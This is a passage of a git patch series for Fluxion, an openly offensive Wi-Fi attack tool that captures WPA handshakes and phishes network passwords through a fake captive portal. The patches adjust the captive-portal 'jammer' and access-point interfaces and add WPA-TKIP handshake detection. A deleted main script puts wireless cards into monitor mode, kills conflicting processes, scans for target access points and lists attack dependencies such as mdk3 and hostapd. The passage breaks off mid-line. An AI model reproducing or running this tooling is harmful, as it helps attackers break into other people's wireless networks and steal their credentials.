iw dev $CaptivePortalAPInterface del \ + &> $FLUXIONOutputDevice; then + fluxion_conditional_bail "Unable to remove virtual interface!" + exit 1 + fi + fi CaptivePortalAPInterface="" } @@ -75,13 +83,32 @@ captive_portal_set_ap_interface() { echo "Succeeded get ap interface." > $FLUXIONOutputDevice CaptivePortalAPInterface=${FluxionInterfaces[$FluxionInterfaceSelected]} + + # If interfaces are the same, we need an independent virtual interface. + if [ "$CaptivePortalAPInterface" = \ + "$CaptivePortalJammerInterface" ]; then + # TODO: Make fluxion's interface services manage virtual interfaces. + # Have fluxion_get_interface return a virutal interface if the primary + # interface is in used by something else (virtual reservation?). + echo "Virtual interface required, attempting." > $FLUXIONOutputDevice + if ! iw dev $CaptivePortalJammerInterface interface \ + add ${CaptivePortalJammerInterface}v type monitor \ + 2> $FLUXIONOutputDevice; then + echo -e "$FLUXIONVLine $CaptivePortalCannotStartInterfaceError" + sleep 5 + return 2 + fi + echo "Virtual interface created successfully." > $FLUXIONOutputDevice + CaptivePortalAPInterface=${CaptivePortalJammerInterface}v + fi } captive_portal_unset_authenticator() { if [ ! "$CaptivePortalAuthenticatorMode" ]; then return 0; fi case "$CaptivePortalAuthenticatorMode" in - "hash") fluxion_unset_hash ;; + "hash") + echo "Unset hash is done automatically." > $FLUXIONOutputDevice ;; esac CaptivePortalAuthenticatorMode="" @@ -181,6 +208,9 @@ captive_portal_unset_certificate() { if [ ! "$CaptivePortalSSL" ]; then return 1; fi sandbox_remove_workfile "$FLUXIONWorkspacePath/server.pem" CaptivePortalSSL="" + + # Since we're auto-selecting when on auto, trigger undo-chain. + if [ "$FLUXIONAuto" ]; then return 2; fi } # Create Self-Signed SSL Certificate @@ -300,7 +330,7 @@ captive_portal_set_user_interface() { if [ "$CaptivePortalUserInterface" != "" -a \ -d "$FLUXIONPath/attacks/Captive Portal/sites/$CaptivePortalUserInterface.portal" ]; then return 0; fi - captive_portal_unset_portal + captive_portal_unset_user_interface local sites=() @@ -351,7 +381,7 @@ captive_portal_set_user_interface() { captive_portal_generic ;; "$FLUXIONGeneralBackOption") - captive_portal_unset_portal + captive_portal_unset_user_interface return 1 ;; *) From 6a5efbdbdd579595adda4f897f42aca533db99dc Mon Sep 17 00:00:00 2001 From: Matias Barcenas Date: Wed, 17 Jan 2018 23:22:03 -0600 Subject: [PATCH 21/45] Added detection support for WPA-TKIP. --- lib/HashUtils.sh | 8 ++++++-- 1 file changed, 6 insertions(+), 2 deletions(-) diff --git a/lib/HashUtils.sh b/lib/HashUtils.sh index bfd9b2a..cb12671 100755 --- a/lib/HashUtils.sh +++ b/lib/HashUtils.sh @@ -11,7 +11,11 @@ function hash_check_handshake() { local -r handshakeAPSSID=$3 local -r handshakeAPMAC=$4 - echo "Verifier Parameters: $handshakeVerifier, path $handshakePath, SSID \"$handshakeAPSSID\", MAC $handshakeAPMAC" > $HashOutputDevice + echo "Verifier Parameters: " > $HashOutputDevice + echo " Verifier: $handshakeVerifier" > $HashOutputDevice + echo "Hash Path: $handshakePath" > $HashOutputDevice + echo "Hash SSID: \"$handshakeAPSSID\"" > $HashOutputDevice + echo " Hash MAC: $handshakeAPMAC" > $HashOutputDevice local analysis # Since it's being used in all relevant instances. @@ -27,7 +31,7 @@ function hash_check_handshake() { if [ "$hashMeta" ]; then local hashID=$(echo "$hashMeta" | awk -F'[ #:]' '{print $3}') - local hashData=$(echo "${analysis[@]}" | awk "\$0~/#$hashID: HMAC_SHA[0-9]+_AES/{ print \$0 }") + local hashData=$(echo "${analysis[@]}" | awk "\$0~/#$hashID: HMAC_(SHA[0-9]+_AES|MD5_RC4)/{ print \$0 }") else echo "No valid hash meta was found for \"$handshakeAPSSID\"" > $HashOutputDevice fi From 9e719e22ea2ed61970c350527fa5695c0e3b6bc1 Mon Sep 17 00:00:00 2001 From: Matias Barcenas Date: Wed, 17 Jan 2018 23:23:22 -0600 Subject: [PATCH 22/45] Removed obsolete interface-selection subroutine. --- lib/InterfaceUtils.sh | 52 +------------------------------------------ 1 file changed, 1 insertion(+), 51 deletions(-) diff --git a/lib/InterfaceUtils.sh b/lib/InterfaceUtils.sh index ab7b2a6..9156c19 100755 --- a/lib/InterfaceUtils.sh +++ b/lib/InterfaceUtils.sh @@ -179,54 +179,4 @@ function interface_reidentify() { return $? } -function interface_prompt() { - if [ -z "$1" -o -z "$2" ]; then return 1; fi - - local __interface_prompt__ifAvailable=("${!2}") - local __interface_prompt__ifAvailableInfo=() - local __interface_prompt__ifAvailableColor=() - local __interface_prompt__ifAvailableState=() - - local __interface_prompt__ifCandidate - for __interface_prompt__ifCandidate in "${__interface_prompt__ifAvailable[@]}"; do - interface_chipset "$__interface_prompt__ifCandidate" - __interface_prompt__ifAvailableInfo+=("$InterfaceChipset") - - interface_state "$__interface_prompt__ifCandidate" - - if [ "$InterfaceState" = "up" ]; then - __interface_prompt__ifAvailableColor+=("$CPrp") - __interface_prompt__ifAvailableState+=("[-]") - else - __interface_prompt__ifAvailableColor+=("$CClr") - __interface_prompt__ifAvailableState+=("[+]") - fi - done - - # The following conditional is required since io_query_format_fields - # only considers the the size of the first parameter, available color. - if [ "$6" ]; then # Add alternative choices - __interface_prompt__ifAvailable+=("${!3}") - __interface_prompt__ifAvailableInfo+=("${!4}") - __interface_prompt__ifAvailableState+=("${!5}") - __interface_prompt__ifAvailableColor+=("${!6}") - fi - - # If only one interface exists and it's available, choose it. - if [ "${#__interface_prompt__ifAvailable[@]}" -eq 1 -a "${__interface_prompt__ifAvailableState[0]}" = "[+]" ]; then - InterfacePromptWISelected="${__interface_prompt__ifAvailable[0]}" - InterfacePromptWISelectedState="[+]" # It passed the condition, it must be + - InterfacePromptWISelectedInfo="${__interface_prompt__ifAvailableInfo[0]}" - else - format_apply_autosize "$CRed[$CSYel%1d$CClr$CRed]%b %-8b %3s$CClr %-*.*s\n" - io_query_format_fields "$1" "$FormatApplyAutosize" \ - __interface_prompt__ifAvailableColor[@] __interface_prompt__ifAvailable[@] \ - __interface_prompt__ifAvailableState[@] __interface_prompt__ifAvailableInfo[@] - - echo - - InterfacePromptIfSelected="${IOQueryFormatFields[1]}" - InterfacePromptIfSelectedState="${IOQueryFormatFields[2]}" - InterfacePromptWISelectedInfo="${IOQueryFormatFields[3]}" - fi -} +# FLUXSCRIPT END From c66d11feb39a89cdb43b033f5c50230157986c83 Mon Sep 17 00:00:00 2001 From: Matias Barcenas Date: Wed, 17 Jan 2018 23:25:53 -0600 Subject: [PATCH 23/45] Removed Fluxion V3. --- fluxion.sh | 1025 ---------------------------------------------------- 1 file changed, 1025 deletions(-) delete mode 100755 fluxion.sh diff --git a/fluxion.sh b/fluxion.sh deleted file mode 100755 index dc73f09..0000000 --- a/fluxion.sh +++ /dev/null @@ -1,1025 +0,0 @@ -#!/bin/bash - -################################ < FLUXION Parameters > ################################ -# NOTE: The FLUXIONPath constant will not be populated correctly if the script is called -# directly via a symlink. Symlinks in the path to the script should work completely fine. -declare -r FLUXIONPath="$(cd "$(dirname "$0")" ;pwd -P -)" - -declare -r FLUXIONWorkspacePath="/tmp/fluxspace" -declare -r FLUXIONHashPath="$FLUXIONPath/attacks/Handshake Snooper/handshakes" -declare -r FLUXIONScanDB="dump" - -declare -r FLUXIONNoiseFloor=-90 -declare -r FLUXIONNoiseCeiling=-60 - -declare -r FLUXIONVersion=3 -declare -r FLUXIONRevision=11 - -declare -r FLUXIONDebug=${FLUXIONDebug:+1} -declare -r FLUXIONWIKillProcesses=${FLUXIONWIKillProcesses:+1} -declare -r FLUXIONWIReloadDriver=${FLUXIONWIReloadDriver:+1} -declare -r FLUXIONAuto=${FLUXIONAuto:+1} - -# FLUXIONDebug [Normal Mode "" / Developer Mode 1] -declare -r FLUXIONOutputDevice=$([ $FLUXIONDebug ] && echo "/dev/stdout" || echo "/dev/null") - -declare -r FLUXIONHoldXterm=$([ $FLUXIONDebug ] && echo "-hold" || echo "") - -################################# < Library Includes > ################################# -source lib/installer/InstallerUtils.sh -source lib/InterfaceUtils.sh -source lib/SandboxUtils.sh -source lib/FormatUtils.sh -source lib/ColorUtils.sh -source lib/IOUtils.sh -source lib/HashUtils.sh - -################################ < FLUXION Parameters > ################################ -FLUXIONPrompt="$CRed[${CSBlu}fluxion$CSYel@$CSWht$HOSTNAME$CClr$CRed]-[$CSYel~$CClr$CRed]$CClr " -FLUXIONVLine="$CRed[$CSYel*$CClr$CRed]$CClr" - -################################ < Library Parameters > ################################ -InterfaceUtilsOutputDevice="$FLUXIONOutputDevice" - -SandboxWorkspacePath="$FLUXIONWorkspacePath" -SandboxOutputDevice="$FLUXIONOutputDevice" - -InstallerUtilsWorkspacePath="$FLUXIONWorkspacePath" -InstallerUtilsOutputDevice="$FLUXIONOutputDevice" -InstallerUtilsNoticeMark="$FLUXIONVLine" - -PackageManagerLog="$InstallerUtilsWorkspacePath/package_manager.log" - -IOUtilsHeader="fluxion_header" -IOUtilsQueryMark="$FLUXIONVLine" -IOUtilsPrompt="$FLUXIONPrompt" - -HashOutputDevice="$FLUXIONOutputDevice" - -################################# < Super User Check > ################################# -if [ $EUID -ne 0 ]; then - echo -e "${CRed}You don't have admin privilegies, execute the script as root.$CClr" - exit 1 -fi - -################################### < XTerm Checks > ################################### -if [ ! "${DISPLAY:-}" ]; then - echo -e "${CRed}The script should be exected inside a X (graphical) session.$CClr" - exit 2 -fi - -if ! hash xdpyinfo 2>/dev/null; then - echo -e "${CRed}xdpyinfo not installed, please install the relevant package for your distribution.$CClr" - exit 3 -fi - -if ! xdpyinfo &>/dev/null; then - echo -e "${CRed}The script failed to initialize an xterm test session.$CClr" - exit 3 -fi - -################################# < Default Language > ################################# -source language/en.sh - -################################# < User Preferences > ################################# -if [ -x "$FLUXIONPath/preferences.sh" ]; then source "$FLUXIONPath/preferences.sh"; fi - -######################################################################################## -function fluxion_exitmode() { - if [ $FLUXIONDebug ]; then return 1; fi - - fluxion_header - - echo -e "$CWht[$CRed-$CWht]$CRed $FLUXIONCleanupAndClosingNotice$CClr" - - # List currently running processes which we might have to kill before exiting. - local processes - readarray processes < <(ps -A) - - # Currently, fluxion is only responsible for killing airodump-ng, because - # fluxion explicitly it uses it to scan for candidate target access points. - # NOTICE: Processes started by subscripts, such as an attack script, - # MUST BE TERMINATED BY THAT SAME SCRIPT in the subscript's abort handler. - local targets=("airodump-ng") - - local targetID # Program identifier/title - for targetID in "${targets[@]}"; do - # Get PIDs of all programs matching targetPID - local targetPID=$(echo "${processes[@]}" | awk '$4~/'"$targetID"'/{print $1}') - if [ ! "$targetPID" ]; then continue; fi - echo -e "$CWht[$CRed-$CWht] $(io_dynamic_output $FLUXIONKillingProcessNotice)" - killall $targetPID &>$FLUXIONOutputDevice - done - - # If the installer activated the package manager, make sure to undo any changes. - if [ "$PackageManagerCLT" ]; then - echo -e "$CWht[$CRed-$CWht] "$(io_dynamic_output "$FLUXIONRestoringPackageManagerNotice")"$CClr" - unprep_package_manager - fi - - if [ "$WIMonitor" ]; then - echo -e "$CWht[$CRed-$CWht] $FLUXIONDisablingMonitorNotice$CGrn $WIMonitor$CClr" - if [ "$FLUXIONAirmonNG" ]; then airmon-ng stop "$WIMonitor" &>$FLUXIONOutputDevice - else interface_set_mode "$WIMonitor" "managed" - fi - fi - - echo -e "$CWht[$CRed-$CWht] $FLUXIONRestoringTputNotice$CClr" - tput cnorm - - if [ ! $FLUXIONDebug ]; then - echo -e "$CWht[$CRed-$CWht] $FLUXIONDeletingFilesNotice$CClr" - sandbox_remove_workfile "$FLUXIONWorkspacePath/*" - fi - - if [ $FLUXIONWIKillProcesses ]; then - echo -e "$CWht[$CRed-$CWht] $FLUXIONRestartingNetworkManagerNotice$CClr" - - # systemctl check - systemd=$(whereis systemctl) - if [ "$systemd" = "" ]; then - service network-manager restart &>$FLUXIONOutputDevice & - service networkmanager restart &>$FLUXIONOutputDevice & - service networking restart &>$FLUXIONOutputDevice & - else - systemctl restart NetworkManager &>$FLUXIONOutputDevice & - fi - fi - - echo -e "$CWht[$CGrn+$CWht] $CGrn$FLUXIONCleanupSuccessNotice$CClr" - echo -e "$CWht[$CGrn+$CWht] $CGry$FLUXIONThanksSupportersNotice$CClr" - - sleep 3 - - clear - - exit 0 -} - -# Delete log only in Normal Mode ! -function fluxion_conditional_clear() { - # Clear iff we're not in debug mode - if [ ! $FLUXIONDebug ]; then clear; fi -} - -function fluxion_conditional_bail() { - echo ${1:-"Something went wrong, whoops! (report this)"} - sleep 5 - if [ ! $FLUXIONDebug ]; then - fluxion_handle_exit - return 1 - fi - echo "Press any key to continue execution..." - read bullshit -} - -# ERROR Report only in Developer Mode -function fluxion_error_report() { - echo "Error on line $1" -} - -if [ "$FLUXIONDebug" ]; then - trap 'fluxion_error_report $LINENUM' ERR -fi - -function fluxion_handle_abort_attack() { - if [ $(type -t stop_attack) ]; then - stop_attack &>$FLUXIONOutputDevice - unprep_attack &>$FLUXIONOutputDevice - else - echo "Attack undefined, can't stop anything..." >$FLUXIONOutputDevice - fi -} - -# In case an abort signal is received, -# abort any attacks currently running. -trap fluxion_handle_abort_attack SIGABRT - -function fluxion_handle_exit() { - fluxion_handle_abort_attack - fluxion_exitmode - exit 1 -} - -# In case of unexpected termination, run fluxion_exitmode -# to execute cleanup and reset commands. -trap fluxion_handle_exit SIGINT SIGHUP - -function fluxion_header() { - format_apply_autosize "[%*s]\n" - local verticalBorder=$FormatApplyAutosize - - format_apply_autosize "[%*s${CSRed}FLUXION $FLUXIONVersion${CSWht}.${CSBlu}$FLUXIONRevision$CSRed <$CIRed F${CIYel}luxion$CIRed I${CIYel}s$CIRed T${CIYel}he$CIRed F${CIYel}uture$CClr$CSYel >%*s$CSBlu]\n" - local headerTextFormat="$FormatApplyAutosize" - - fluxion_conditional_clear - - echo -e "$(printf "$CSRed$verticalBorder" "" | sed -r "s/ /~/g")" - printf "$CSRed$verticalBorder" "" - printf "$headerTextFormat" "" "" - printf "$CSBlu$verticalBorder" "" - echo -e "$(printf "$CSBlu$verticalBorder" "" | sed -r "s/ /~/g")$CClr" - echo - echo -} - -# Create working directory -if [ ! -d "$FLUXIONWorkspacePath" ]; then - mkdir -p "$FLUXIONWorkspacePath" &>$FLUXIONOutputDevice -fi - -####################################### < Start > ###################################### -if [ ! $FLUXIONDebug ]; then - FLUXIONBanner=() - - format_center_literals " ⌠▓▒▓▒ ⌠▓╗ ⌠█┐ ┌█ ┌▓\ /▓┐ ⌠▓╖ ⌠◙▒▓▒◙ ⌠█\ ☒┐" - FLUXIONBanner+=("$FormatCenterLiterals") - format_center_literals " ║▒_ │▒║ │▒║ ║▒ \▒\/▒/ │☢╫ │▒┌╤┐▒ ║▓▒\ ▓║" - FLUXIONBanner+=("$FormatCenterLiterals") - format_center_literals " ≡◙◙ ║◙║ ║◙║ ║◙ ◙◙ ║¤▒ ║▓║☯║▓ ♜◙\✪\◙♜" - FLUXIONBanner+=("$FormatCenterLiterals") - format_center_literals " ║▒ │▒║__ │▒└_┘▒ /▒/\▒\ │☢╫ │▒└╧┘▒ ║█ \▒█║" - FLUXIONBanner+=("$FormatCenterLiterals") - format_center_literals " ⌡▓ ⌡◘▒▓▒ ⌡◘▒▓▒◘ └▓/ \▓┘ ⌡▓╝ ⌡◙▒▓▒◙ ⌡▓ \▓┘" - FLUXIONBanner+=("$FormatCenterLiterals") - format_center_literals "¯¯¯ ¯¯¯¯¯¯ ¯¯¯¯¯¯¯ ¯¯¯ ¯¯¯ ¯¯¯¯ ¯¯¯¯¯¯¯ ¯¯¯¯¯¯¯¯" - FLUXIONBanner+=("$FormatCenterLiterals") - - clear - - if [ "$FLUXIONAuto" ]; then echo -e "$CBlu" - else echo -e "$CRed" - fi - - for line in "${FLUXIONBanner[@]}"; do - echo "$line" - sleep 0.05 - done - #echo "${FLUXIONBanner[@]}" - echo - - sleep 0.1 - format_center_literals "${CGrn}Site: ${CRed}https://github.com/FluxionNetwork/fluxion$CClr" - echo -e "$FormatCenterLiterals" - - sleep 0.1 - format_center_literals "${CSRed}FLUXION $FLUXIONVersion$CClr (rev. $CSBlu$FLUXIONRevision$CClr)$CYel by$CWht ghost" - echo -e "$FormatCenterLiterals" - - sleep 0.1 - if installer_utils_check_update "https://raw.githubusercontent.com/FluxionNetwork/fluxion/master/fluxion.sh" "FLUXIONVersion=" "FLUXIONRevision=" $FLUXIONVersion $FLUXIONRevision; then installer_utils_run_update "https://github.com/FluxionNetwork/fluxion/archive/master.zip" "FLUXION-V$FLUXIONVersion.$FLUXIONRevision" "$(dirname "$FLUXIONPath")" - fi - - echo - - FLUXIONCLIToolsRequired=("aircrack-ng" "python2:python2.7|python2" "bc" "awk:awk|gawk|mawk" "curl" "dhcpd:isc-dhcp-server|dhcp" "7zr:p7zip" "hostapd" "lighttpd" "iwconfig:wireless-tools" "macchanger" "mdk3" "nmap" "openssl" "php-cgi" "pyrit" "xterm" "rfkill" "unzip" "route:net-tools" "fuser:psmisc" "killall:psmisc") - FLUXIONCLIToolsMissing=() - - while ! installer_utils_check_dependencies FLUXIONCLIToolsRequired[@]; do installer_utils_run_dependencies InstallerUtilsCheckDependencies[@] - done -fi - -#################################### < Resolution > #################################### -function fluxion_set_resolution() { # Windows + Resolution - # Calc options - RATIO=4 - - # Get demensions - SCREEN_SIZE=$(xdpyinfo | grep dimension | awk '{print $4}' | tr -d "(") - SCREEN_SIZE_X=$(printf '%.*f\n' 0 $(echo $SCREEN_SIZE | sed -e s'/x/ /'g | awk '{print $1}')) - SCREEN_SIZE_Y=$(printf '%.*f\n' 0 $(echo $SCREEN_SIZE | sed -e s'/x/ /'g | awk '{print $2}')) - - PROPOTION=$(echo $(awk "BEGIN {print $SCREEN_SIZE_X/$SCREEN_SIZE_Y}")/1 | bc) - NEW_SCREEN_SIZE_X=$(echo $(awk "BEGIN {print $SCREEN_SIZE_X/$RATIO}")/1 | bc) - NEW_SCREEN_SIZE_Y=$(echo $(awk "BEGIN {print $SCREEN_SIZE_Y/$RATIO}")/1 | bc) - - NEW_SCREEN_SIZE_BIG_X=$(echo $(awk "BEGIN {print 1.5*$SCREEN_SIZE_X/$RATIO}")/1 | bc) - NEW_SCREEN_SIZE_BIG_Y=$(echo $(awk "BEGIN {print 1.5*$SCREEN_SIZE_Y/$RATIO}")/1 | bc) - - SCREEN_SIZE_MID_X=$(echo $(($SCREEN_SIZE_X + ($SCREEN_SIZE_X - 2 * $NEW_SCREEN_SIZE_X) / 2))) - SCREEN_SIZE_MID_Y=$(echo $(($SCREEN_SIZE_Y + ($SCREEN_SIZE_Y - 2 * $NEW_SCREEN_SIZE_Y) / 2))) - - # Upper - TOPLEFT="-geometry $NEW_SCREEN_SIZE_Xx$NEW_SCREEN_SIZE_Y+0+0" - TOPRIGHT="-geometry $NEW_SCREEN_SIZE_Xx$NEW_SCREEN_SIZE_Y-0+0" - TOP="-geometry $NEW_SCREEN_SIZE_Xx$NEW_SCREEN_SIZE_Y+$SCREEN_SIZE_MID_X+0" - - # Lower - BOTTOMLEFT="-geometry $NEW_SCREEN_SIZE_Xx$NEW_SCREEN_SIZE_Y+0-0" - BOTTOMRIGHT="-geometry $NEW_SCREEN_SIZE_Xx$NEW_SCREEN_SIZE_Y-0-0" - BOTTOM="-geometry $NEW_SCREEN_SIZE_Xx$NEW_SCREEN_SIZE_Y+$SCREEN_SIZE_MID_X-0" - - # Y mid - LEFT="-geometry $NEW_SCREEN_SIZE_Xx$NEW_SCREEN_SIZE_Y+0-$SCREEN_SIZE_MID_Y" - RIGHT="-geometry $NEW_SCREEN_SIZE_Xx$NEW_SCREEN_SIZE_Y-0+$SCREEN_SIZE_MID_Y" - - # Big - TOPLEFTBIG="-geometry $NEW_SCREEN_SIZE_BIG_Xx$NEW_SCREEN_SIZE_BIG_Y+0+0" - TOPRIGHTBIG="-geometry $NEW_SCREEN_SIZE_BIG_Xx$NEW_SCREEN_SIZE_BIG_Y-0+0" -} - -##################################### < Language > ##################################### -function fluxion_set_language() { - if [ "$FLUXIONAuto" ]; then - FLUXIONLanguage="en" - else - # Get all languages available. - local languageCodes - readarray -t languageCodes < <(ls -1 language | sed -E 's/\.sh//') - - local languages - readarray -t languages < <(head -n 3 language/*.sh | grep -E "^# native: " | sed -E 's/# \w+: //') - - io_query_format_fields "$FLUXIONVLine Select your language" "\t$CRed[$CSYel%d$CClr$CRed]$CClr %s / %s\n" languageCodes[@] languages[@] - - FLUXIONLanguage=${IOQueryFormatFields[0]} - - echo # Leave this spacer. - - # Check if all language files are present for the selected language. - find -type d -name language | while read language_dir; do - if [ ! -e "$language_dir/${FLUXIONLanguage}.sh" ]; then - echo -e "$FLUXIONVLine ${CYel}Warning${CClr}, missing language file:" - echo -e "\t$language_dir/${FLUXIONLanguage}.sh" - return 1 - fi - done - - # If a file is missing, fall back to english. - if [ $? -eq 1 ]; then - echo -e "\n\n$FLUXIONVLine Falling back to English..." - sleep 5 - FLUXIONLanguage="en" - return 1 - fi - - source "$FLUXIONPath/language/$FLUXIONLanguage.sh" - fi -} - -#################################### < Interfaces > #################################### -function fluxion_unset_interface() { - # Unblock interfaces to make them available. - echo -e "$FLUXIONVLine $FLUXIONUnblockingWINotice" - rfkill unblock all &>$FLUXIONOutputDevice - - # Find all monitor-mode interfaces & all AP interfaces. - echo -e "$FLUXIONVLine $FLUXIONFindingExtraWINotice" - local wiMonitors=($(iwconfig 2>&1 | grep "Mode:Monitor" | awk '{print $1}')) - - # Remove all monitor-mode & all AP interfaces. - echo -e "$FLUXIONVLine $FLUXIONRemovingExtraWINotice" - if [ ${#wiMonitors[@]} -gt 0 ]; then - local monitor - for monitor in ${wiMonitors[@]}; do - # Remove any previously created fluxion AP interfaces. - #iw dev "FX${monitor:2}AP" del &> $FLUXIONOutputDevice - - # Remove monitoring interface after AP interface. - if [[ "$monitor" == *"mon" ]]; then airmon-ng stop "$monitor" >$FLUXIONOutputDevice - else interface_set_mode "$monitor" "managed" - fi - - if [ $FLUXIONDebug ]; then - echo -e "Stopped $monitor." - fi - done - fi - - WIMonitor="" -} - -# Choose Interface -function fluxion_set_interface() { - if [ "$WIMonitor" ]; then return 0; fi - - fluxion_unset_interface - - # Gather candidate interfaces. - echo -e "$FLUXIONVLine $FLUXIONFindingWINotice" - - # List of all available wireless network interfaces. - # These will be stored in our array right below. - interface_list_wireless - - local wiAlternate=("$FLUXIONGeneralRepeatOption") - local wiAlternateInfo=("") - local wiAlternateState=("") - local wiAlternateColor=("$CClr") - - interface_prompt "$FLUXIONVLine $FLUXIONInterfaceQuery" InterfaceListWireless[@] \ - wiAlternate[@] wiAlternateInfo[@] wiAlternateState[@] wiAlternateColor[@] - - local wiSelected=$InterfacePromptIfSelected - - if [ "$wiSelected" = "$FLUXIONGeneralRepeatOption" ]; then - fluxion_unset_interface - return 1 - fi - - if [ ! "$FLUXIONWIKillProcesses" -a "$InterfacePromptIfSelectedState" = "[-]" ]; then - echo -e "$FLUXIONVLine $FLUXIONSelectedBusyWIError" - echo -e "$FLUXIONVLine $FLUXIONSelectedBusyWITip" - sleep 7 - fluxion_unset_interface - return 1 - fi - - if ! fluxion_run_interface "$wiSelected"; then return 1 - fi - - WIMonitor="$FluxionRunInterface" -} - -function fluxion_run_interface() { - if [ ! "$1" ]; then return 1; fi - - local ifSelected="$1" - - if [ "$FLUXIONWIReloadDriver" ]; then - # Get selected interface's driver details/info-descriptor. - echo -e "$FLUXIONVLine $FLUXIONGatheringWIInfoNotice" - - if ! interface_driver "$ifSelected"; then - echo -e "$FLUXIONVLine$CRed $FLUXIONUnknownWIDriverError" - sleep 3 - return 1 - fi - - local ifDriver="$InterfaceDriver" - - # I'm not really sure about this conditional here. - # FLUXION 2 had the conditional so I kept it there. - if [ ! "$(echo $ifDriver | egrep 'rt2800|rt73')" ]; then - rmmod -f $ifDriver &>$FLUXIONOutputDevice 2>&1 - - # Wait while interface becomes unavailable. - echo -e "$FLUXIONVLine $(io_dynamic_output $FLUXIONUnloadingWIDriverNotice)" - while interface_physical "$ifSelected"; do sleep 1 - done - fi - fi - - if [ "$FLUXIONWIKillProcesses" ]; then - # Get list of potentially troublesome programs. - echo -e "$FLUXIONVLine $FLUXIONFindingConflictingProcessesNotice" - # This shit has to go reeeeeal soon (airmon-ng)... - local conflictPrograms=($(airmon-ng check | awk 'NR>6{print $2}')) - - # Kill potentially troublesome programs. - echo -e "$FLUXIONVLine $FLUXIONKillingConflictingProcessesNotice" - for program in "${conflictPrograms[@]}"; do killall "$program" &>$FLUXIONOutputDevice - done - fi - - if [ "$FLUXIONWIReloadDriver" ]; then - # I'm not really sure about this conditional here. - # FLUXION 2 had the conditional so I kept it there. - if [ ! "$(echo $ifDriver | egrep 'rt2800|rt73')" ]; then modprobe "$ifDriver" &>$FLUXIONOutputDevice 2>&1 - fi - - # Wait while interface becomes available. - echo -e "$FLUXIONVLine $(io_dynamic_output $FLUXIONLoadingWIDriverNotice)" - while ! interface_physical "$ifSelected"; do sleep 1 - done - fi - - # Activate wireless interface monitor mode and save identifier. - echo -e "$FLUXIONVLine $FLUXIONStartingWIMonitorNotice" - if [ "$FLUXIONAirmonNG" ]; then - # TODO: Need to check weather switching to monitor mode below failed. - # Notice: Line below could cause issues with different airmon versions. - FluxionRunInterface=$(airmon-ng start $ifSelected | awk -F'\[phy[0-9]+\]|\)' '$0~/monitor .* enabled/{print $3}' 2>/dev/null) - else - if interface_set_mode "$ifSelected" "monitor"; then FluxionRunInterface=$ifSelected - else FluxionRunInterface="" - fi - fi - - if [ "$FluxionRunInterface" ]; then - echo -e "$FLUXIONVLine $FLUXIONMonitorModeWIEnabledNotice" - sleep 3 - else - echo -e "$FLUXIONVLine $FLUXIONMonitorModeWIFailedError" - sleep 3 - return 2 - fi -} - -###################################### < Scanner > ##################################### -function fluxion_set_scanner() { - # If scanner's already been set and globals are ready, we'll skip setup. - if [ "$APTargetSSID" -a "$APTargetChannel" -a "$APTargetEncryption" -a \ - "$APTargetMAC" -a "$APTargetMakerID" -a "$APRogueMAC" ]; then - return 0 - fi - - if [ "$FLUXIONAuto" ]; then - fluxion_run_scanner $WIMonitor - else - local choices=("$FLUXIONScannerChannelOptionAll (2.4GHz)" "$FLUXIONScannerChannelOptionAll (5GHz)" "$FLUXIONScannerChannelOptionAll (2.4GHz & 5Ghz)" "$FLUXIONScannerChannelOptionSpecific" "$FLUXIONGeneralBackOption") - io_query_choice "$FLUXIONScannerChannelQuery" choices[@] - - echo - - case "$IOQueryChoice" in - "$FLUXIONScannerChannelOptionAll (2.4GHz)") fluxion_run_scanner $WIMonitor "" "bg" ;; - "$FLUXIONScannerChannelOptionAll (5GHz)") fluxion_run_scanner $WIMonitor "" "a" ;; - "$FLUXIONScannerChannelOptionAll (2.4GHz & 5Ghz)") fluxion_run_scanner $WIMonitor "" "abg" ;; - "$FLUXIONScannerChannelOptionSpecific") fluxion_set_scanner_channel ;; - "$FLUXIONGeneralBackOption") - fluxion_unset_interface - return 1 - ;; - esac - fi - - if [ $? -ne 0 ]; then return 1; fi -} - -function fluxion_set_scanner_channel() { - fluxion_header - - echo -e "$FLUXIONVLine $FLUXIONScannerChannelQuery" - echo - echo -e " $FLUXIONScannerChannelSingleTip ${CBlu}6$CClr " - echo -e " $FLUXIONScannerChannelMiltipleTip ${CBlu}1-5$CClr " - echo -e " $FLUXIONScannerChannelMiltipleTip ${CBlu}1,2,5-7,11$CClr " - echo - echo -ne "$FLUXIONPrompt" - - local channels - read channels - - echo - - fluxion_run_scanner $WIMonitor $channels - if [ $? -ne 0 ]; then return 1; fi -} - -# Parameters: monitor [ channel(s) [ band(s) ] ] -function fluxion_run_scanner() { - if [ ${#@} -lt 1 ]; then return 1; fi - - echo -e "$FLUXIONVLine $FLUXIONStartingScannerNotice" - echo -e "$FLUXIONVLine $FLUXIONStartingScannerTip" - - # Remove any pre-existing scanner results. - sandbox_remove_workfile "$FLUXIONWorkspacePath/dump*" - - if [ "$FLUXIONAuto" ]; then - sleep 30 && killall xterm & - fi - - # Begin scanner and output all results to "dump-01.csv." - if ! xterm -title "$FLUXIONScannerHeader" $TOPLEFTBIG -bg "#000000" -fg "#FFFFFF" -e "airodump-ng -Mat WPA "${2:+"--channel $2"}" "${3:+"--band $3"}" -w \"$FLUXIONWorkspacePath/dump\" $1" 2>/dev/null; then - echo -e "$FLUXIONVLine$CRed $FLUXIONGeneralXTermFailureError" - sleep 5 - return 1 - fi - - # Fix this below, creating subshells for something like this is somewhat ridiculous. - local scannerResultsExist=$([ -f "$FLUXIONWorkspacePath/dump-01.csv" ] && echo true) - local scannerResultsReadable=$([ -s "$FLUXIONWorkspacePath/dump-01.csv" ] && echo true) - - if [ ! "$scannerResultsReadable" ]; then - if [ "$scannerResultsExist" ]; then - sandbox_remove_workfile "$FLUXIONWorkspacePath/dump*" - fi - - local choices=("$FLUXIONGeneralBackOption" "$FLUXIONGeneralExitOption") - io_query_choice "$FLUXIONScannerFailedNotice" choices[@] - - echo - - case "$IOQueryChoice" in - "$FLUXIONGeneralBackOption") return 1 ;; - "$FLUXIONGeneralExitOption") - fluxion_exitmode - return 2 - ;; - esac - fi - - # Syntheize scan operation results from output file "dump-01.csv." - echo -e "$FLUXIONVLine $FLUXIONPreparingScannerResultsNotice" - # Unfortunately, mawk (alias awk) does not support the {n} times matching operator. - # readarray TargetAPCandidates < <(gawk -F, 'NF==15 && $1~/([A-F0-9]{2}:){5}[A-F0-9]{2}/ {print $0}' $FLUXIONWorkspacePath/dump-01.csv) - readarray TargetAPCandidates < <(awk -F, 'NF==15 && length($1)==17 && $1~/([A-F0-9][A-F0-9]:)+[A-F0-9][A-F0-9]/ {print $0}' "$FLUXIONWorkspacePath/dump-01.csv") - # readarray TargetAPCandidatesClients < <(gawk -F, 